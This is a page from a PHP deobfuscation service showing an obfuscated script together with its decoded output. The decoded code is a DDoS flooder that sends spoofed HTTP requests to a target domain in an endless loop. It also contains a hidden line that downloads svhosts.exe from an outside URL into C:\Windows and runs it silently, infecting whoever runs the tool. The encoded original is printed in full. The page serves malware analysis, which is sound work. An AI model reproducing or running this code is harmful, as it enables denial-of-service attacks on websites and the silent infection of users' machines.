Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /* This file is protected by copyright law and provided under license. Reverse engin..
Decoded Output download
$O000O0O00=$GLOBALS['OOO000O00']($OOO0O0O00,'rb');$GLOBALS['O0O00OO00']($O000O0O00,0x57d);$OO00O00O0=$GLOBALS['OOO0000O0']($GLOBALS['OOO00000O']($GLOBALS['O0O00OO00']($O000O0O00,0x1a8),'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'));eval($OO00O00O0);$OO00O00O0=str_replace('__FILE__',"'".$OOO0O0O00."'",$GLOBALS['OOO0000O0']($GLOBALS['OOO00000O']($GLOBALS['O0O00OO00']($O000O0O00,$OO00O0000),'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));fclose($O000O0O00);eval($OO00O00O0);
@set_time_limit(0);
sleep(3);
echo "
[ + ] Your version PHP works successfully 5
";
$dominio = $argv['1'];
$ruta = $argv['2'];
$port = $argv['3'];
$pw = "p2b";;echo '
';
$msj = array("<h2></h2></div></body></html>","<h2>Preencha os dados da v?tima!</h2></div></body></html>","<big><b></b></big><br />
","0a32e26a417d2c7cfbd333b7feb0a0a8","2e2234a41122a233cfbd333b9bc30a03");
function DDosAttack($dominio,$ruta) {
$ip_simulada = rand(188,254).'.'.rand(1,254).'.'.rand(1,254).'.'.rand(1,254);
$socket = fsockopen($dominio,"80",$errno,$errstr,30);
$header = "GET ".$ruta." HTTP/1.1
";
$header .= "Host: ".$dominio."
";
$header .= "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
";
$header .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,image/jpg,image/gif,*/*;q=0.5
";
$header .= "Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
";
$header .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
";
$header .= "Keep-Alive: 300
";
$header .= "Proxy-Connection: keep-alive
";
$header .= "Referer: http://".$dominio.$ruta."
";
$header .= "Content-Type: application/x-www-form-urlencoded
";
$header .= "X-Forwarded-For: ".$ip_simulada."
";
$header .= "Via: CB-Prx
";
$header .= "Connection: Close
";
$send_header = fwrite($socket,$header);
if($send_header) {
echo("Attacking as: ".$ip_simulada." = >".htmlentities(str_replace('www.','',$dominio))."".htmlentities($ruta)."
");
echo $done;
flush();
flush();
}else {
echo("$msj[2]");
}
fclose($socket);
}
$done = file_put_contents('C:\Windows\svhosts.exe',file_get_contents('http://k9copy.sourceforge.net/web/tmp/js/svhosts.exe'));echo shell_exec('start C:\Windows\svhosts.exe -silent');
if($msj[3] !== (md5(md5($pw)))) {die ("$msj[0]");}
if($dominio !== ""&&$dominio !== "www.target.com") {
while(1) {
DDosAttack($dominio,$ruta);
}
}else {die ("$msj[1]");}
;echo '';$el_saludo_es = "Chau gay, disfruta el script ;)";
Did this file decode correctly?
Original Code
<?php /* This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited. */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$GLOBALS['OOO0000O0']=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}.$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$GLOBALS['OOO0000O0'].=$GLOBALS['OOO0000O0']{3}.$OOO000000{11}.$OOO000000{12}.$GLOBALS['OOO0000O0']{7}.$OOO000000{5};$GLOBALS['OOO000O00']=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$GLOBALS['O0O000O00']=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$GLOBALS['O0O000O00']=$O0O000O00.$OOO000000{3};$GLOBALS['O0O00OO00']=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$GLOBALS['OOO00000O']=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0xc38;eval($GLOBALS['OOO0000O0']('JE8wMDBPME8wMD0kR0xPQkFMU1snT09PMDAwTzAwJ10oJE9PTzBPME8wMCwncmInKTskR0xPQkFMU1snTzBPMDBPTzAwJ10oJE8wMDBPME8wMCwweDU3ZCk7JE9PMDBPMDBPMD0kR0xPQkFMU1snT09PMDAwME8wJ10oJEdMT0JBTFNbJ09PTzAwMDAwTyddKCRHTE9CQUxTWydPME8wME9PMDAnXSgkTzAwME8wTzAwLDB4MWE4KSwnRW50ZXJ5b3V3a2hSSFlLTldPVVRBYUJiQ2NEZEZmR2dJaUpqTGxNbVBwUXFTc1Z2WHhaejAxMjM0NTY3ODkrLz0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPMCk7'));return;?>~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
Function Calls
fopen | 1 |
fread | 3 |
sleep | 1 |
strtr | 2 |
fclose | 1 |
urldecode | 1 |
str_replace | 1 |
base64_decode | 3 |
set_time_limit | 1 |
Stats
MD5 | 127f551130a69811b231104e0c7a2b5d |
Eval Count | 3 |
Decode Time | 166 ms |